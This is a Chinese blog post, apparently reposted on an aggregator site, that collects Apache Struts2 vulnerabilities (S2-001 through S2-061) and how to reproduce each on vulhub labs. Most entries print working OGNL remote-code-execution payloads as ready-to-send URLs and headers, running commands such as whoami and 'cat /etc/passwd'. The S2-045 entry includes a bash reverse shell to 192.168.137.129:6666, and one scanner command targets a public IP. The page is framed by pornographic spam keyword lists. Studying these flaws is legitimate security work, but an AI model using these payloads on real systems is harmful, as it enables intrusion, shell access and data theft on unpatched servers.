日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Strust2漏洞汇总

發(fā)布時間:2023/12/8 编程问答 51 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Strust2漏洞汇总 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

本文所涉及的復(fù)現(xiàn)環(huán)境均可在vulhub上復(fù)現(xiàn)
文章包含了絕大部分漏洞,少部分未總結(jié)

文章目錄

    • S2-001:
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn):
    • S2-003
      • 原理:
      • 影響版本:
      • POC
    • S2-005
      • 原理:
      • 影響版本:
      • 漏洞復(fù)現(xiàn):
    • S2-007:
      • 原理:
      • 影響版本:
      • POC:
      • 復(fù)現(xiàn):
    • S2-008:
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn):
    • S2-009
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn):
    • S2-013:
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn):
    • S2-015:
      • 原理:
      • 影響版本:
      • POC:
      • 復(fù)現(xiàn):
    • S2-016:(很重要)
      • 原理:
      • 影響版本:
      • POC:
      • 復(fù)現(xiàn):
    • S2-032:
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn)
    • S2-045:
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn):
    • S2-046:
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn):
    • S2-048:
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn):
    • S2-053:
      • 原理:
      • 影響版本:
      • 漏洞復(fù)現(xiàn):
    • S2-057:
      • 原理:
      • 影響版本:
      • 評價:
    • S2-059 061:
      • 原理:
      • 影響版本:
      • 復(fù)現(xiàn):
    • 總結(jié):

S2-001:

原理:

該漏洞因用戶提交表單數(shù)據(jù)并且驗證失敗時,后端會將用戶之前提交的參數(shù)值使用OGNL表達(dá)式%{value}進行解析,然后重新填充到對應(yīng)的表單數(shù)據(jù)中。如注冊或登錄頁面,提交失敗后一般會默認(rèn)返回之前提交的數(shù)據(jù),由于后端使用%{value}對提交的數(shù)據(jù)執(zhí)行了一次OGNL 表達(dá)式解析,所以可以直接構(gòu)造 Payload進行命令執(zhí)行。

影響版本:

Struts 2.0.0 - Struts 2.0.8

復(fù)現(xiàn):

啟動環(huán)境:

該漏洞原理以及很清楚了,就是因為用戶提交形如%{value}的參數(shù)值會被解析并且返回到前端,所以我們可以利用該解析達(dá)到RCE的效果

測試一下:

發(fā)現(xiàn)被解析。可以使用如下命令:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} //獲取tomcat路徑 %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()} //RCE whoami

幾張效果圖:
cmd: ls

S2-003

原理:

Struts會將HTTP的每個參數(shù)名解析為ognl語句執(zhí)行(可以理解為Java代碼)。ognl表達(dá)式通過#來訪問struts的對象,Struts框架通過過濾#字符防止安全問題,通過unicode編碼(u0023)或8進制(43)即可繞過安全限制,從而能夠操縱服務(wù)器端上下文對象。

影響版本:

影響版本: 2.0.0 - 2.0.11.2

POC

RCE的POC:

http://127.0.0.1:8080/struts2-showcase-2.0.1/showcase.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023mycmd\u003d\'ipconfig\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla))

S2-005

原理:

該漏洞原理和S2 003一樣,S2是003由于#引起的,因此官方在這個更新鐘,僅僅是將進行#過濾防止引發(fā)安全問題,但是#依然可以通過編碼的形式進行繞過

影響版本:

2.0.0 - 2.1.8.1

漏洞復(fù)現(xiàn):

這里使用K8的工具進行復(fù)現(xiàn)即可:
檢測


RCE:

S2-007:

原理:

簡單來講:S2-007的漏洞是當(dāng)提交表單中變量的類型出現(xiàn)錯誤時,進行了錯誤的字符串拼接,后端會執(zhí)行OGNL表達(dá)式

嚴(yán)肅點講:
S2-007漏洞一般出現(xiàn)在表單處。當(dāng)配置了驗證規(guī)則 -validation.xml時,若類型驗證轉(zhuǎn)換出錯,后端默認(rèn)會將用戶提交的表單值通過字符串拼接,然后執(zhí)行一次 OGNL 表達(dá)式解析并返回。要成功利用,只需要找到一個配置了類似驗證規(guī)則的表單字段使之轉(zhuǎn)換出錯,借助類似單引號拼接的方式即可注入任意 OGNL 表達(dá)式。 //這里的重點是驗證類型出錯,記住是驗證類型出錯才會導(dǎo)致。

具體來看看什么叫驗證類型出錯:
UserAction:

public class UserAction extends ActionSupport {private Integer age;private String name;private String email;

xml

<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE validators PUBLIC"-//OpenSymphony Group//XWork Validator 1.0//EN""http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd"> <validators><field name="age"><field-validator type="int"><param name="min">1</param><param name="max">150</param></field-validator></field> </validators>

這個時候如果我們提交age為非整形的話,就會出現(xiàn)報錯,那么拼接報錯語句,通過執(zhí)行OGNL從而達(dá)到RCE的目的

影響版本:

2.0.0 - 2.2.3

POC:

’ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java.lang.Boolean(“false”) ,#context[“xwork.MethodAccessor.denyMethodExecution”]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘whoami’).getInputStream())) + ’ ## exec()跟上cmd

注意:這里POC傳入的時候需要二次編碼
二次編碼后的結(jié)果:

%27+%2b+(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23foo%3dnew+java.lang.Boolean(%22false%22)+%2c%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d%23foo%2c%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()))+%2b+%27

復(fù)現(xiàn):

S2-008:

原理:

簡單來講:主要是利用對傳入?yún)?shù)沒有嚴(yán)格限制,導(dǎo)致多個地方可以執(zhí)行惡意代碼,傳入?debug=command&expression=即可執(zhí)行OGNL表達(dá)式

影響版本:

Struts 2.1.0 - Struts 2.3.1

復(fù)現(xiàn):

POC(cmd自己更換就好):

ip:port/devmode.action?debug=command&expression=(%23_memberAccess.allowStaticMethodAccess=true,%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=false,%23cmd=%22ls%22,%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[100],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo))

S2-009

原理:

OGNL提供了廣泛的表達(dá)式評估功能等功能。該漏洞允許惡意用戶繞過ParametersInterceptor內(nèi)置的所有保護(正則表達(dá)式,拒絕方法調(diào)用),從而能夠?qū)⑷魏伪┞兜淖址兞恐械膼阂獗磉_(dá)式注入進行進一步評估。
在S2-003和S2-005中已經(jīng)解決了類似的行為,但事實證明,基于列入可接受的參數(shù)名稱的結(jié)果修復(fù)僅部分地關(guān)閉了該漏洞。
ParametersInterceptor中的正則表達(dá)式將top [‘foo’](0)作為有效的表達(dá)式匹配,OGNL將其作為(top [‘foo’])(0)處理,并將“foo”操作參數(shù)的值作為OGNL表達(dá)式求值。這使得惡意用戶將任意的OGNL語句放入由操作公開的任何String變量中,并將其評估為OGNL表達(dá)式,并且由于OGNL語句在HTTP參數(shù)中,攻擊者可以使用黑名單字符(例如#)禁用方法執(zhí)行并執(zhí)行任意方法,繞過ParametersInterceptor和OGNL庫保護。

影響版本:

2.0.0-2.3.1

復(fù)現(xiàn):

這里可以使用工具掃描:

python Struts2Scan.py -u http://106.54.169.132:8080

這里使用官方提供的包進行復(fù)現(xiàn)(vulhub可以直接下載):
首先找到路徑

存在傳參的地方在/ajax/example5.action這里

POC:

?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

再說一下 只要存在傳參點就可以打

S2-013:

原理:

struts2的標(biāo)簽中 <s:a> 和 <s:url> 都有一個 includeParams 屬性,可以設(shè)置成如下值

none - URL中不包含任何參數(shù)(默認(rèn)) get - 僅包含URL中的GET參數(shù) all - 在URL中包含GET和POST參數(shù)

當(dāng)includeParams=all的時候,會將本次請求的GET和POST參數(shù)都放在URL的GET參數(shù)上。

此時<s:a> 或<s:url>嘗試去解析原始請求參數(shù)時,會導(dǎo)致OGNL表達(dá)式的執(zhí)行

影響版本:

2.0.0.0-2.3.14

復(fù)現(xiàn):

這里可以使用K8工具復(fù)現(xiàn),也可以直接手打復(fù)現(xiàn):
POC:

link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('ls').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

S2-015:

原理:

如果一個請求與任何其他定義的操作不匹配,它將被匹配,*并且所請求的操作名稱將用于以操作名稱加載JSP文件。并且,1作為OGNL表達(dá)式的威脅值,{ }可以在服務(wù)器端執(zhí)行任意的Java代碼

影響版本:

2.0.0 - 2.3.14.2

POC:

復(fù)現(xiàn):

環(huán)境搭建隨便點擊業(yè)務(wù)發(fā)現(xiàn):

隨便傳一個action:
找到漏洞點,上POC:

yourip+port/${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#m=#_memberAccess.getClass().getDeclaredField(‘a(chǎn)llowStaticMethodAccess’),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ls’).getInputStream()),#q}.action

值得一提的是,這里需要進行二次url編碼然后傳參

S2-016:(很重要)

原理:

在struts2中,DefaultActionMapper類支持以"action:"、“redirect:”、"redirectAction:"作為導(dǎo)航或是重定向前綴,但是這些前綴后面同時可以跟OGNL表達(dá)式,由于struts2沒有對這些前綴做過濾,導(dǎo)致利用OGNL表達(dá)式調(diào)用java靜態(tài)方法執(zhí)行任意系統(tǒng)命令。

影響版本:

非常廣 2.0.0 – Struts 2.3.15

POC:

${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("uname -a").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}

需要進行二次編碼:

%24%7b%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2c%23f.setAccessible(true)%2c%23f.set(%23_memberAccess%2ctrue)%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%22uname+-a%22).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b5000%5d%2c%23c.read(%23d)%2c%23genxor%3d%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2c%23genxor.println(%23d)%2c%23genxor.flush()%2c%23genxor.close()%7d

復(fù)現(xiàn):

原理已經(jīng)說的很清楚了,就是因為以action或者redirect作為重定向或者導(dǎo)向時可跟OGNL表達(dá)式,從而RCE,基本特征就是以.action或者.redirect結(jié)尾,可以批量,我隨便看了下,這洞太久遠(yuǎn)了,2013年的,肯定還是存在漏洞的,只是少了

S2-032:

原理:

在配置了 Struts2 DMI 為 True 的情況下,可以使用 method:name Action 前綴去調(diào)用聲明為 public 的函數(shù),DMI 的相關(guān)使用方法可參考官方介紹(Dynamic Method Invocation),這個 DMI 的調(diào)用特性其實一直存在,只不過在低版本中 Strtus2 不會對 name 方法值做 OGNL 計算,而在高版本中會。所以只要找到目標(biāo)應(yīng)用中有效的 Action 例如 index.action,那么直接使用 DMI 在 method: 后面帶上需要執(zhí)行 OGNL 表達(dá)式即可。
比如這樣的ognl 表達(dá)式: #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#f=@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]),#f.close&cmd=open /Applications/Calculator.app 通過反射調(diào)用(關(guān)于java的反射調(diào)用可以參考之前的一篇文章Link)Runtime類的exec方法進行命令執(zhí)行,這里是打開計算器的操作。
//這一塊存在動態(tài)函數(shù)的調(diào)用,建議想要深入了解的同學(xué)可以調(diào)試一下代碼看看

影響版本:

Struts 2.3.20 - Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)

復(fù)現(xiàn)

Struts2在開啟了動態(tài)方法調(diào)用(Dynamic Method Invocation)的情況下,可以使用method:name的方式來調(diào)用名字是name的方法,而這個方法名將會進行OGNL表達(dá)式計算,導(dǎo)致遠(yuǎn)程命令執(zhí)行漏洞。

http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami

S2-045:

原理:

很有趣的一個洞:通過Content-Type這個header頭,注入OGNL語言,進而執(zhí)行命令。漏洞的點在于,由于Strus2對錯誤消息處理時,出現(xiàn)了紕漏。
網(wǎng)上說需要在上傳文件的時候content-type才可以被解析,也有說只需要模擬上傳就可以。包含multipart/form-data字符串即可。我在本地進行測試的時候只在上傳的時候才解析成功。

影響版本:

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

復(fù)現(xiàn):

在上傳的時候抓包,更改content-type即可

Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data

測試:
反彈shell:

Content-Type: "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "bash -i >&/dev/tcp/192.168.137.129/6666 0>&1"|bash').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

S2-046:

原理:

同S2-045一樣,只不過字段發(fā)生了變化,這里的參數(shù)是filename。

影響版本:

Affected Version: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

復(fù)現(xiàn):

個人建議這里直接使用工具就好了,直接去復(fù)現(xiàn)的化也可以,也就是改filename,然后00階段即可

S2-048:

原理:

將用戶可控的值添加到 ActionMessage 并在客戶前端展示,導(dǎo)致其進入 getText 函數(shù),最后 message 被當(dāng)作 ognl 表達(dá)式執(zhí)行所以訪問 /integration/saveGangster.action 構(gòu)造payload

影響版本:

2.0.0 - 2.3.32
這個漏洞影響很小,了解一下就好。

復(fù)現(xiàn):

因為不是很廣切利用條件太苛刻,直接上工具吧
工具的話,感覺有點雞肋,因為光一個IP的化還是不行的,可惜這個工具不能自帶爬蟲,或許結(jié)合xray+red+工具更好一點

S2-053:

原理:

Struts2在使用Freemarker模板引擎的時候,同時允許解析OGNL表達(dá)式。導(dǎo)致用戶輸入的數(shù)據(jù)本身不會被OGNL解析,但由于被Freemarker解析一次后變成離開一個表達(dá)式,被OGNL解析第二次,導(dǎo)致任意命令執(zhí)行漏洞。

影響版本:

Affected Version: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10

漏洞復(fù)現(xiàn):

原理說的很通俗了,就是由于數(shù)據(jù)被進行二次解析從而可以RCE導(dǎo)致


EXP:
···
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)😦(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘whoami’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{’/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

// cmd=‘whoami’ 命令自行替換即可
···

值得注意的是,這里需要換行才能RCE,最后一定要換行

S2-057:

原理:

DefaultActionMapper調(diào)用parseNameAndNamespace()解析namespace和name。當(dāng)alwaysSelectFullNamespace為true時,namespace的值可以通過uri控制

影響版本:

Affected Version: <= Struts 2.3.34, Struts 2.5.16

評價:

工具直接復(fù)現(xiàn)就好

S2-059 061:

原理:

Apache Struts2使用某些標(biāo)簽時,會對標(biāo)簽屬性值進行二次表達(dá)式解析,當(dāng)標(biāo)簽屬性值使用了%{skillName}并且skillName的值用戶可以控制,就會造成OGNL表達(dá)式執(zhí)行,都很弱雞,利用條件苛刻

<s:url var="url" namespace="/employee" action="list"/><s:a id="%{payload}" href="%{url}">List available Employees</s:a>

影響版本:

Struts 2.0.0 - Struts 2.5.20

復(fù)現(xiàn):

因為這里是傳入的標(biāo)簽屬性值進行了解析,所以只要值可控,傳入適當(dāng)?shù)腜LAYLOAD即可RCE

簡單測試一下:
?id=%25{2*2}
評價:此次漏洞需要開啟altSyntax功能,只能是在標(biāo)簽id屬性中存在表達(dá)式,并且參數(shù)還可以控制,這種場景在實際開發(fā)中非常少見,危害較小。

總結(jié):

復(fù)現(xiàn)了這么多洞,基本上都是由于配置解析的問題,真正意義上的反序列化倒沒有存在很多問題,大部分是由于配置不當(dāng)或者組件問題造成的,批量的話,也就s2-016要多一點。多了解一點總不是壞事。以上有講解錯誤的地方,歡迎師傅們指出。

總結(jié)

以上是生活随笔為你收集整理的Strust2漏洞汇总的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

日韩久久影院 | 黄在线免费观看 | av色网站| 亚洲干 | 99r在线播放| 在线视频观看亚洲 | 天天躁日日 | 日韩精品视频久久 | 天天射色综合 | 国产麻豆剧传媒免费观看 | 欧美成人aa | 久久久久电影网站 | 欧美a级片网站 | 国产伦精品一区二区三区照片91 | 天天射天天干天天爽 | 日韩免费视频一区二区 | 欧美福利片在线观看 | 久久一区二区三区四区 | 91久久久国产精品 | 亚洲国产高清视频 | 国产对白av | 日日夜夜中文字幕 | 久久激情网站 | 中国黄色一级大片 | 91视频免费看网站 | 福利一区二区 | 国产精品欧美日韩 | 三级在线国产 | 日韩欧美视频免费看 | 成人黄色免费观看 | 五月婷丁香网 | www.亚洲精品在线 | 久久伊人八月婷婷综合激情 | 九九热精品视频在线观看 | 亚洲另类久久 | 九九视频网 | 免费看一级黄色大全 | 中文字幕在线观看视频一区二区三区 | 青草视频在线播放 | 日韩h在线观看 | 三级黄色大片在线观看 | 久久久久久久久久亚洲精品 | 激情片av | 久久成人久久 | 免费成视频 | 日本精品一区二区三区在线播放视频 | 日韩免费大片 | 超碰97免费在线 | 波多野结衣一区三区 | 久久激情日本aⅴ | 天天躁天天操 | 爱爱av网| 国产视频在线免费 | 在线观看你懂的网址 | 国产欧美日韩一区 | 欧美性生活一级片 | 999久久精品 | 国产午夜精品一区二区三区四区 | 在线观看免费视频 | 在线高清 | 久久久久久久久久影院 | 超碰av在线播放 | 99tvdz@gmail.com| 日韩一区二区三 | 日韩在线看片 | 久久国产精品免费视频 | 精品久久久久亚洲 | 成 人 黄 色视频免费播放 | 亚洲欧美日韩在线看 | 久久久久久国产一区二区三区 | 国产精彩视频一区二区 | 中文字幕专区高清在线观看 | 碰天天操天天 | 黄色免费观看视频 | 国产香蕉av | 狠狠干成人综合网 | 天堂在线成人 | 国产黄色理论片 | 亚洲精品视频免费观看 | 九九热在线观看 | 日韩毛片在线免费观看 | 狠狠干天天色 | 欧美日韩成人 | 精品一区三区 | 久久久精华网 | 国产精品1区2区在线观看 | 欧美精品久久久久久久免费 | 在线看国产一区 | 91麻豆免费版 | 亚洲欧洲一区二区在线观看 | 欧美一二区视频 | 91久久久国产精品 | 国产资源在线免费观看 | 国产精品久久久999 国产91九色视频 | 国产精品99在线播放 | 69国产盗摄一区二区三区五区 | 就要干b| 国产不卡视频在线播放 | 亚洲欧美激情插 | 久久免费观看视频 | 99热在线看 | 国产手机视频在线 | 69中文字幕 | 99视屏 | 色综合久久久久久久久五月 | 99超碰在线播放 | 人人干在线观看 | 欧美在线日韩在线 | 色婷婷www| 最新中文字幕在线播放 | 一区二区三区在线影院 | 欧美欧美 | 伊人婷婷 | 亚洲综合色丁香婷婷六月图片 | 国产一级片在线播放 | 婷婷国产一区二区三区 | 国产精品日韩在线观看 | 精品一区二区电影 | 久久久久久久久久影院 | 日韩欧美在线高清 | 在线观看亚洲 | 2019中文字幕网站 | 欧美一级日韩三级 | a久久久久 | 九九视频免费在线观看 | 日韩有码中文字幕在线 | 免费黄色小网站 | 国产一级二级在线观看 | 免费看麻豆| 欧美男男tv网站 | 一区二区网 | 综合久久五月天 | 99久在线精品99re8热视频 | 午夜在线观看一区 | 欧美亚洲免费在线一区 | 超薄丝袜一二三区 | 久久专区 | 在线观看一区 | 97香蕉久久超级碰碰高清版 | 国产九九热视频 | 午夜精品在线看 | 欧美伦理电影一区二区 | 中文字幕国产一区二区 | 欧美日韩国产二区 | 日韩精品一区二区三区免费观看 | 日日干夜夜草 | 久久综合福利 | 丝袜+亚洲+另类+欧美+变态 | 九九免费在线观看视频 | 黄色小说在线观看视频 | 国产精久久久久久妇女av | 国产精品一区电影 | 日韩r级电影在线观看 | 激情综合婷婷 | 中文字幕在线观看免费高清完整版 | 日韩中文字幕91 | 久久久久久久亚洲精品 | 午夜私人影院久久久久 | 久久免费毛片 | 91亚洲精品久久久蜜桃 | 中文字幕a∨在线乱码免费看 | 毛片网在线 | 亚洲精品一区中文字幕乱码 | 国产精品2019 | 国产剧情在线一区 | 久久男人中文字幕资源站 | av中文字幕在线看 | wwwwwww黄 | 国产高清在线免费观看 | 欧美美女一级片 | 成人av资源网站 | 精品久久国产一区 | 玖玖在线精品 | 热久久99这里有精品 | 免费看黄的视频 | 国产黄色片免费在线观看 | 在线黄网站| 久久这里只有精品23 | 免费观看www7722午夜电影 | 国产96精品 | 欧美福利久久 | 国产精品一区二区美女视频免费看 | 久久999久久 | 天天天天射| 又黄又爽又湿又无遮挡的在线视频 | 久久国产二区 | 天天射网站 | 国产五月色婷婷六月丁香视频 | 日本不卡123 | 婷婷色网址| 婷婷在线综合 | 中文字幕在线人 | 黄p网站在线观看 | 91精品国产网站 | 国产精品成人av电影 | 91视频国产高清 | 精品欧美小视频在线观看 | 成人va在线观看 | 免费h漫在线观看 | 毛片www| 天天爽天天射 | 久久久久久美女 | 69精品在线观看 | 久久久久久久久久久久99 | 最近日本字幕mv免费观看在线 | 波多野结衣网址 | 99在线视频播放 | 欧美一级看片 | 夜夜躁狠狠躁日日躁视频黑人 | 在线播放精品一区二区三区 | 最近更新好看的中文字幕 | 麻豆91精品视频 | 亚洲欧洲精品久久 | 成年人黄色免费视频 | 最近高清中文在线字幕在线观看 | 欧美精品一区二区蜜臀亚洲 | 18国产精品白浆在线观看免费 | 欧美日韩免费观看一区=区三区 | 色婷婷国产精品一区在线观看 | 国产va饥渴难耐女保洁员在线观看 | 国产一级视频在线 | 欧美在线视频一区二区三区 | 色婷婷六月天 | 亚洲黄色片在线 | 欧美另类成人 | 国产在线综合视频 | 日韩福利在线观看 | 成 人 黄 色 片 在线播放 | 免费激情网 | 五月天,com | 亚洲另类在线视频 | 五月婷婷在线视频观看 | 蜜臀久久99精品久久久无需会员 | 欧美小视频在线 | 国产精品久久久久久久久费观看 | 亚洲免费av在线播放 | 在线观看免费视频 | 久草影视在线观看 | 色九九影院 | 久久好看免费视频 | 国产又粗又猛又色 | 综合五月 | 亚洲精品av中文字幕在线在线 | 久久精品视频网站 | 午夜 久久 tv | 夜夜躁天天躁很躁波 | 国产福利小视频在线 | 黄色影院在线免费观看 | 91精选在线观看 | 国产精品大全 | 国产精品高潮呻吟久久av无 | 丰满少妇在线观看 | 中文字幕免费观看视频 | 色婷婷在线视频 | 久久久精品国产免费观看一区二区 | 成人在线免费看 | 日韩经典一区二区三区 | 日韩精品久久一区二区 | 在线观看国产麻豆 | 欧美视屏一区二区 | 婷婷丁香九月 | 亚洲视频 在线观看 | 91超级碰碰 | 国产 亚洲 欧美 在线 | 91 在线视频 | 国产视频在线播放 | 精品久久久久久久久久久久久久久久久久 | 91精品国产91久久久久 | 国产一级性生活 | 国产精品黄网站在线观看 | 手机在线观看国产精品 | 精品99在线 | 国产视频一二三 | 人人狠狠综合久久亚洲婷 | 欧洲精品一区二区 | 国产18精品乱码免费看 | 亚洲精品视频在线观看视频 | 亚洲精品乱码白浆高清久久久久久 | 久久久久国产精品www | 国产在线观看你懂得 | 免费看黄色小说的网站 | 日本中文字幕一二区观 | 一区二区三区在线影院 | 美女网站色在线观看 | 精品国产伦一区二区三区免费 | av一区二区在线观看中文字幕 | 欧美精品中文字幕亚洲专区 | 国产一区久久久 | 国产黄网站在线观看 | 在线免费高清视频 | 色婷婷五| 色婷婷综合久色 | 国产精品 欧美 日韩 | 午夜天天操 | a视频在线观看 | 久久99精品国产麻豆婷婷 | 国产精品成人免费 | av免费电影网站 | av黄色成人| a级片久久| 免费日韩av电影 | 亚欧日韩成人h片 | 成人观看| 国产黄色美女 | 久久精品视频在线 | 国产小视频在线看 | 丁香婷婷电影 | 五月天综合网站 | 欧美一级电影片 | 日韩高清在线一区二区三区 | 成人免费视频观看 | 婷婷在线精品视频 | 91精品国产高清自在线观看 | 成人h在线观看 | 亚洲婷婷免费 | 99久久婷婷国产综合亚洲 | 久久激情五月丁香伊人 | 人人爱人人爽 | 国产精品h在线观看 | 久久免费黄色网址 | 久久久久久久国产精品影院 | 国产亚洲精品成人av久久影院 | 成人av在线影视 | 欧美激情综合色综合啪啪五月 | 又湿又紧又大又爽a视频国产 | 狠狠色伊人亚洲综合网站色 | 一本到视频在线观看 | 91丨九色丨国产在线 | 欧美日本一二三 | 久久你懂的 | 国产精品久久久久久久久久久不卡 | 成人黄色小视频 | 欧美性脚交| 日韩在线免费播放 | 99久热在线精品视频 | 黄色不卡av| 最近乱久中文字幕 | 99视频免费看 | 天天操天天操一操 | 五月综合在线观看 | 日韩有码欧美 | 中文字幕成人网 | 成人免费观看在线视频 | 91在线产啪 | 国产九九在线 | 一区二区三区国产欧美 | 91污污| 国产成人精品一区二区三区网站观看 | 亚洲国产mv| 精品国产免费人成在线观看 | 日韩精品一区二区不卡 | 最新av网站在线观看 | 91精品一区国产高清在线gif | 